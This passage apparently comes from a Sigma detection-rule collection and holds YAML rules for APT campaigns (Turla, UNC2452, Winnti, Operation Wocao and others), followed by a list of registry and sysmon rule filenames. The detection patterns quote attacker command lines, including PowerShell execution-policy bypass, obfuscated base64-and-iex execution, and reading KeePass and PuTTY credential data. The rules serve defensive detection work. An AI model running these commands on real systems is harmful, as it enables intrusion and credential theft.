  23.   - attack.g0092
  24.   - attack.t1106

proc_creation_win_apt_taidoor.yml
  1. title: TAIDOOR RAT DLL Load
  2. id: d1aa3382-abab-446f-96ea-4de52908210b
  3. status: test
  4. description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load
  5. author: Florian Roth
  6. references:
  7.   - https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a
  8. date: 2020/07/30
  9. modified: 2021/11/27
  10. logsource:
  11.   category: process_creation
  12.   product: windows
  13. detection:
  14.   selection1:
  15.     CommandLine|contains:
  16.       - 'dll,MyStart'
  17.       - 'dll MyStart'
  18.   selection2a:
  19.     CommandLine|endswith:
  20.       - ' MyStart'
  21.   selection2b:
  22.     CommandLine|contains:
  23.       - 'rundll32.exe'
  24.   condition: selection1 or ( selection2a and selection2b )
  25. falsepositives:
  26.   - Unknown
  27. level: critical
  28. tags:
  29.   - attack.execution
  30.   - attack.t1055.001

proc_creation_win_apt_tropictrooper.yml
  1. title: TropicTrooper Campaign November 2018
  2. id: 8c7090c3-e0a0-4944-bd08-08c3a0cecf79
  3. author: '@41thexplorer, Microsoft Defender ATP'
  4. status: stable
  5. date: 2019/11/12
  6. modified: 2020/08/27
  7. description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
  8. references:
  9.     - https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/
  10. tags:
  11.     - attack.execution
  12.     - attack.t1059.001
  13. logsource:
  14.     category: process_creation
  15.     product: windows
  16. detection:
  17.     selection:
  18.         CommandLine|contains: 'abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc'
  19.     condition: selection
  20. level: high

proc_creation_win_apt_turla_commands_critical.yml
  1. title: Turla Group Lateral Movement
  2. id: c601f20d-570a-4cde-a7d6-e17f99cb8e7f
  3. status: experimental
  4. description: Detects automated lateral movement by Turla group
  5. references:
  6.     - https://securelist.com/the-epic-turla-operation/65545/
  7. tags:
  8.     - attack.g0010
  9.     - attack.execution
  10.     - attack.t1059
  11.     - attack.lateral_movement
  12.     - attack.t1021.002
  13.     - attack.discovery
  14.     - attack.t1083
  15.     - attack.t1135
  16. author: Markus Neis
  17. date: 2017/11/07
  18. modified: 2021/09/19
  19. logsource:
  20.     category: process_creation
  21.     product: windows
  22. detection:
  23.    selection:
  24.       CommandLine:
  25.          - 'net use \\%DomainController%\C$ "P@ssw0rd" *'
  26.          - 'dir c:\\*.doc* /s'
  27.          - 'dir %TEMP%\\*.exe'
  28.    condition: selection
  29. level: critical
  30. falsepositives:
  31.    - Unknown

proc_creation_win_apt_turla_commands_medium.yml
  1. title: Turla Group Lateral Movement
  2. id: 75925535-ca97-4e0a-a850-00b5c00779dc
  3. status: experimental
  4. description: Detects automated lateral movement by Turla group
  5. references:
  6.     - https://securelist.com/the-epic-turla-operation/65545/
  7. tags:
  8.     - attack.g0010
  9.     - attack.execution
  10.     - attack.t1059
  11.     - attack.lateral_movement
  12.     - attack.t1021.002
  13.     - attack.discovery
  14.     - attack.t1083
  15.     - attack.t1135
  16. author: Markus Neis
  17. date: 2017/11/07
  18. modified: 2021/09/19
  19. logsource:
  20.     category: process_creation
  21.     product: windows
  22. detection:
  23.    netCommand1:
  24.       CommandLine: 'net view /DOMAIN'
  25.    netCommand2:
  26.       CommandLine: 'net session'
  27.    netCommand3:
  28.       CommandLine: 'net share'
  29.    timeframe: 1m
  30.    condition: netCommand1 | near netCommand2 and netCommand3
  31. level: medium
  32. falsepositives:
  33.    - Unknown

proc_creation_win_apt_turla_comrat_may20.yml
  2. title: Turla Group Commands May 2020
  3. id: 9e2e51c5-c699-4794-ba5a-29f5da40ac0c
  4. status: test
  5. description: Detects commands used by Turla group as reported by ESET in May 2020
  6. author: Florian Roth
  7. references:
  8.   - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
  9. date: 2020/05/26
  10. modified: 2021/11/27
  11. logsource:
  12.   category: process_creation
  13.   product: windows
  14. detection:
  15.   selection1:
  16.     CommandLine|contains:
  17.       - 'tracert -h 10 yahoo.com'
  18.       - '.WSqmCons))|iex;'
  19.       - 'Fr`omBa`se6`4Str`ing'
  20.   selection2:
  21.     CommandLine|contains|all:
  22.       - 'net use https://docs.live.net'
  23.       - '@aol.co.uk'
  24.   condition: 1 of selection*
  25. falsepositives:
  26.   - Unknown
  27. level: critical
  28. tags:
  29.   - attack.g0010
  30.   - attack.execution
  31.   - attack.t1059.001
  32.   - attack.t1053.005
  33.   - attack.t1027

proc_creation_win_apt_unc2452_cmds.yml
  1. title: UNC2452 Process Creation Patterns
  2. id: 9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f
  3. description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries
  4. status: experimental
  5. references:
  6.     - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
  7. tags:
  8.     - attack.execution
  9.     - attack.t1059.001
  10.     # - sunburst
  11.     # - unc2452
  12. author: Florian Roth
  13. date: 2021/01/22
  14. modified: 2021/06/27
  15. logsource:
  16.     category: process_creation
  17.     product: windows
  18. detection:
  19.     selection1:
  20.         CommandLine|contains: 
  21.             - '7z.exe a -v500m -mx9 -r0 -p'
  22.     selection2:
  23.         ParentCommandLine|contains|all:
  24.             - 'wscript.exe'
  25.             - '.vbs'
  26.         CommandLine|contains|all:
  27.             - 'rundll32.exe'
  28.             - 'C:\Windows'
  29.             - '.dll,Tk_'
  30.     selection3:
  31.         ParentImage|endswith: '\rundll32.exe'
  32.         ParentCommandLine|contains: 'C:\Windows'
  33.         CommandLine|contains: 'cmd.exe /C '
  34.     selection4:
  35.         CommandLine|contains|all: 
  36.             - 'rundll32 c:\windows\'
  37.             - '.dll '
  38.     specific1:
  39.         ParentImage|endswith: '\rundll32.exe'
  40.         Image|endswith: '\dllhost.exe'
  41.     filter1:
  42.         CommandLine: 
  43.             - ' '
  44.             - ''
  45.     condition: selection1 or selection2 or selection3 or selection4 or ( specific1 and not filter1 )
  46. falsepositives:
  47.     - Unknown
  48. level: critical

proc_creation_wi_apt_unc2452_ps.yml
  1. title: UNC2452 PowerShell Pattern
  2. id: b7155193-8a81-4d8f-805d-88de864ca50c
  3. description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
  4. status: experimental
  5. references:
  6.     - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware
  7.     - https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/
  8.     - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command
  9. tags:
  10.     - attack.execution
  11.     - attack.t1059.001
  12.     - attack.t1047
  13.     # - sunburst
  14. author: Florian Roth
  15. date: 2021/01/20
  16. modified: 2021/01/22
  17. logsource:
  18.     category: process_creation
  19.     product: windows
  20. detection:
  21.     selection1:
  22.         CommandLine|contains|all: 
  23.             - 'Invoke-WMIMethod win32_process -name create -argumentlist'
  24.             - 'rundll32 c:\windows'
  25.     selection2:
  26.          CommandLine|contains|all: 
  27.             - 'wmic /node:'
  28.             - 'process call create "rundll32 c:\windows'   
  29.     condition: selection1 or selection2
  30. falsepositives:
  31.     - Unknown, unlikely, but possible
  32. level: critical

proc_creation_win_apt_unidentified_nov_18.yml
  1. title: Unidentified Attacker November 2018
  2. id: 7453575c-a747-40b9-839b-125a0aae324b
  3. status: stable
  4. description: A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with
  5.     YYTRIUM/APT29 campaign in 2016.
  6. references:
  7.     - https://twitter.com/DrunkBinary/status/1063075530180886529
  8. author: '@41thexplorer, Microsoft Defender ATP'
  9. date: 2018/11/20
  10. modified: 2021/09/19
  11. tags:
  12.     - attack.execution
  13.     - attack.t1218.011
  14. logsource:
  15.     category: process_creation
  16.     product: windows
  17. detection:
  18.     selection:
  19.         CommandLine|contains: 'cyzfc.dat,'
  20.         CommandLine|endswith: 'PointFunctionCall'
  21.     condition: selection
  22. level: high

proc_creation_win_apt_winnti_mal_hk_jan20.yml
  1. title: Winnti Malware HK University Campaign
  2. id: 3121461b-5aa0-4a41-b910-66d25524edbb
  3. status: test
  4. description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities
  5. author: Florian Roth, Markus Neis
  6. references:
  7.   - https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/
  8. date: 2020/02/01
  9. modified: 2021/11/27
  10. logsource:
  11.   category: process_creation
  12.   product: windows
  13. detection:
  14.   selection1:
  15.     ParentImage|contains:
  16.       - 'C:\Windows\Temp'
  17.       - '\hpqhvind.exe'
  18.     Image|startswith: 'C:\ProgramData\DRM'
  19.   selection2:
  20.     ParentImage|startswith: 'C:\ProgramData\DRM'
  21.     Image|endswith: '\wmplayer.exe'
  22.   selection3:
  23.     ParentImage|endswith: '\Test.exe'
  24.     Image|endswith: '\wmplayer.exe'
  25.   selection4:
  26.     Image: 'C:\ProgramData\DRM\CLR\CLR.exe'
  27.   selection5:
  28.     ParentImage|startswith: 'C:\ProgramData\DRM\Windows'
  29.     Image|endswith: '\SearchFilterHost.exe'
  30.   condition: 1 of selection*
  31. falsepositives:
  32.   - Unlikely
  33. level: critical
  34. tags:
  35.   - attack.defense_evasion
  36.   - attack.t1574.002
  37.   - attack.g0044

proc_creation_win_apt_winnti_pipemon.yml
  1. title: Winnti Pipemon Characteristics
  2. id: 73d70463-75c9-4258-92c6-17500fe972f2
  3. status: test
  4. description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET
  5. author: Florian Roth, oscd.community
  6. references:
  7.   - https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
  8. date: 2020/07/30
  9. modified: 2021/11/27
  10. logsource:
  11.   category: process_creation
  12.   product: windows
  13. detection:
  14.   selection1:
  15.     CommandLine|contains:
  16.       - 'setup0.exe -p'
  17.   selection2:
  18.     CommandLine|contains|all:
  19.       - 'setup.exe'
  20.     CommandLine|endswith:
  21.       - '-x:0'
  22.       - '-x:1'
  23.       - '-x:2'
  24.   condition: 1 of selection*
  25. falsepositives:
  26.   - Legitimate setups that use similar flags
  27. level: critical
  28. tags:
  29.   - attack.defense_evasion
  30.   - attack.t1574.002
  31.   - attack.g0044

proc_creation_win_apt_wocao.yml
  1. title: Operation Wocao Activity
  2. id: 1cfac73c-be78-4f9a-9b08-5bde0c3953ab
  3. related:
  4.     - id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d
  5.       type: derived
  6. author: Florian Roth, frack113
  7. status: experimental
  8. description: Detects activity mentioned in Operation Wocao report
  9. references:
  10.     - https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/
  11.     - https://twitter.com/SBousseaden/status/1207671369963646976
  12. tags:
  13.     - attack.discovery 
  14.     - attack.t1012
  15.     - attack.defense_evasion
  16.     - attack.t1036.004
  17.     - attack.t1027
  18.     - attack.execution
  19.     - attack.t1053.005
  20.     - attack.t1059.001
  21. date: 2019/12/20
  22. modified: 2021/09/19
  23. logsource:
  24.     category: process_creation
  25.     product: windows
  26. detection:
  27.     selection:
  28.         CommandLine|contains: 
  29.             - 'checkadmin.exe 127.0.0.1 -all'
  30.             - 'netsh advfirewall firewall add rule name=powershell dir=in'
  31.             - 'cmd /c powershell.exe -ep bypass -file c:\s.ps1'
  32.             - '/tn win32times /f'
  33.             - 'create win32times binPath='
  34.             - '\c$\windows\system32\devmgr.dll'
  35.             - ' -exec bypass -enc JgAg'
  36.             - 'type *keepass\KeePass.config.xml'
  37.             - 'iie.exe iie.txt'
  38.             - 'reg query HKEY_CURRENT_USER\Software\\*\PuTTY\Sessions\'
  39.     condition: selection
  40. falsepositives:
  41.     - Administrators that use checkadmin.exe tool to enumerate local administrators
  42. level: high

proc_creation_win_apt_zxshell.yml
  1. title: ZxShell Malware
  2. id: f0b70adb-0075-43b0-9745-e82a1c608fcc
  3. status: test
  4. description: Detects a ZxShell start by the called and well-known function name
  5. author: Florian Roth, oscd.community, Jonhnathan Ribeiro
  6. references:
  7.   - https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100
  8. date: 2017/07/20
  9. modified: 2021/11/27
  10. logsource:
  11.   category: process_creation
  12.   product: windows
  13. detection:
  14.   selection:
  15.     Image|endswith:
  16.       - '\rundll32.exe'
  17.     CommandLine|contains:
  18.       - 'zxFunction'
  19.       - 'RemoteDiskXXXXX'
  20.   condition: selection
  21. fields:
  22.   - CommandLine
  23.   - ParentCommandLine
  24. falsepositives:
  25.   - Unlikely
  26. level: critical
  27. tags:
  28.   - attack.execution
  29.   - attack.t1059.003
  30.   - attack.defense_evasion
  31.   - attack.t1218.011
  32.   - attack.s0412
  33.   - attack.g0001

raw_access_thread

sysmon_raw_disk_access_using_illegitimate_tools.yml

registry_event

registry_event_abusing_windows_telemetry_for_persistence.yml
registry_event_add_local_hidden_user.yml
registry_event_add_port_monitor.yml
registry_event_apt_chafer_mar18.yml
registry_event_apt_leviathan.yml
registry_event_apt_oceanlotus_registry.yml
registry_event_apt_pandemic.yml
registry_event_asep_reg_keys_modification.yml
registry_event_asep_reg_keys_modification_classes.yml
registry_event_asep_reg_keys_modification_common.yml
registry_event_asep_reg_keys_modification_currentcontrolset.yml
registry_event_asep_reg_keys_modification_currentversion.yml
registry_event_asep_reg_keys_modification_currentversion_nt.yml
registry_event_asep_reg_keys_modification_internet_explorer.yml
registry_event_asep_reg_keys_modification_office.yml
registry_event_asep_reg_keys_modification_session_manager.yml
registry_event_asep_reg_keys_modification_system_scripts.yml
registry_event_asep_reg_keys_modification_winsock2.yml
registry_event_asep_reg_keys_modification_wow6432node.yml
registry_event_asep_reg_keys_modification_wow6432node_classes.yml
registry_event_asep_reg_keys_modification_wow6432node_currentversion.yml
registry_event_blackbyte_ransomware.yml
registry_event_bypass_uac_using_delegateexecute.yml
registry_event_bypass_uac_using_eventviewer.yml
registry_event_bypass_uac_using_silentcleanup_task.yml
registry_event_bypass_via_wsreset.yml
registry_event_change_rdp_port.yml
registry_event_change_security_zones.yml
registry_event_chrome_extension.yml
registry_event_cmstp_execution_by_registry.yml
registry_event_cobaltstrike_service_installs.yml
registry_event_comhijack_sdclt.yml
registry_event_crashdump_disabled.yml
registry_event_cve_2020_1048.yml
registry_event_cve_2021_31979_cve_2021_33771_exploits.yml
registry_event_defender_disabled.yml
registry_event_defender_exclusions.yml
registry_event_defender_realtime_protection_disabled.yml
registry_event_dhcp_calloutdll.yml
registry_event_disable_administrative_share.yml
registry_event_disable_defender_firewall.yml
registry_event_disable_microsoft_office_security_features.yml
registry_event_disable_security_events_logging_adding_reg_key_minint.yml
registry_event_disable_uac_registry.yml
registry_event_disable_wdigest_credential_guard.yml
registry_event_disabled_exploit_guard_net_protection_on_ms_defender.yml
registry_event_disabled_pua_protection_on_microsoft_defender.yml
registry_event_disabled_tamper_protection_on_microsoft_defender.yml
registry_event_dns_over_https_enabled.yml
registry_event_dns_serverlevelplugindll.yml
registry_event_enabling_cor_profiler_env_variables.yml
registry_event_esentutl_volume_shadow_copy_service_keys.yml
registry_event_etw_disabled.yml
registry_event_file_association_exefile.yml
registry_event_hack_wce_reg.yml
registry_event_hidden_extention.yml
registry_event_hybridconnectionmgr_svc_installation.yml
registry_event_ie_persistence.yml
registry_event_logon_scripts_userinitmprlogonscript_reg.yml
registry_event_mal_adwind.yml
registry_event_mal_azorult.yml
registry_event_mal_blue_mockingbird.yml
registry_event_mal_flowcloud.yml
registry_event_mal_netwire.yml
registry_event_mal_ursnif.yml
registry_event_mimikatz_printernightmare.yml
registry_event_modify_screensaver_binary_path.yml
registry_event_mstsc_history_cleared.yml
registry_event_narrator_feedback_persistance.yml
registry_event_net_ntlm_downgrade.yml
registry_event_new_application_appcompat.yml
registry_event_new_dll_added_to_appcertdlls_registry_key.yml
registry_event_new_dll_added_to_appinit_dlls_registry_key.yml
registry_event_office_enable_dde.yml
registry_event_office_security.yml
registry_event_office_test_regadd.yml
registry_event_office_vsto_persistence.yml
registry_event_outlook_c2_registry_key.yml
registry_event_outlook_registry_todaypage.yml
registry_event_outlook_registry_webview.yml
registry_event_outlook_security.yml
registry_event_persistence.yml
registry_event_persistence_key_linking.yml
registry_event_persistence_recycle_bin.yml
registry_event_persistence_search_order.yml
registry_event_portproxy_registry_key.yml
registry_event_powershell_as_service.yml
registry_event_rdp_registry_modification.yml
registry_event_rdp_settings_hijack.yml
registry_event_redmimicry_winnti_reg.yml
registry_event_removal_amsi_registry_key.yml
registry_event_removal_com_hijacking_registry_key.yml
registry_event_runkey_winekey.yml
registry_event_runonce_persistence.yml
registry_event_set_servicedll.yml
registry_event_shell_open_keys_manipulation.yml
registry_event_shim_databases_persistence.yml
registry_event_silentprocessexit.yml
registry_event_silentprocessexit_lsass.yml
registry_event_ssp_added_lsa_config.yml
registry_event_stickykey_like_backdoor.yml
registry_event_susp_atbroker_change.yml
registry_event_susp_download_run_key.yml
registry_event_susp_lsass_dll_load.yml
registry_event_susp_mic_cam_access.yml
registry_event_susp_printer_driver.yml
registry_event_susp_reg_persist_explorer_run.yml
registry_event_susp_run_key_img_folder.yml
registry_event_susp_service_installed.yml
registry_event_suspicious_keyboard_layout_load.yml
registry_event_sysinternals_eula_accepted.yml
registry_event_sysinternals_sdelete_registry_keys.yml
registry_event_taskcache_entry.yml
registry_event_telemetry_persistence.yml
registry_event_trust_record_modification.yml
registry_event_uac_bypass_eventvwr.yml
registry_event_uac_bypass_sdclt.yml
registry_event_uac_bypass_winsat.yml
registry_event_uac_bypass_wmp.yml
registry_event_vbs_payload_stored.yml
registry_event_wab_dllpath_reg_change.yml
registry_event_wdigest_enable_uselogoncredential.yml
registry_event_winlogon_notify_key.yml

sysmon

sysmon_accessing_winapi_in_powershell_credentials_dumping.yml
sysmon_config_modification.yml
sysmon_config_modification_error.yml
sysmon_config_modification_status.yml
sysmon_dcom_iertutil_dll_hijack.yml
sysmon_process_hollowing.yml

wmi_event

sysmon_wmi_event_subscription.yml
sysmon_wmi_susp_encoded_scripts.yml
sysmon_wmi_susp_scripting.yml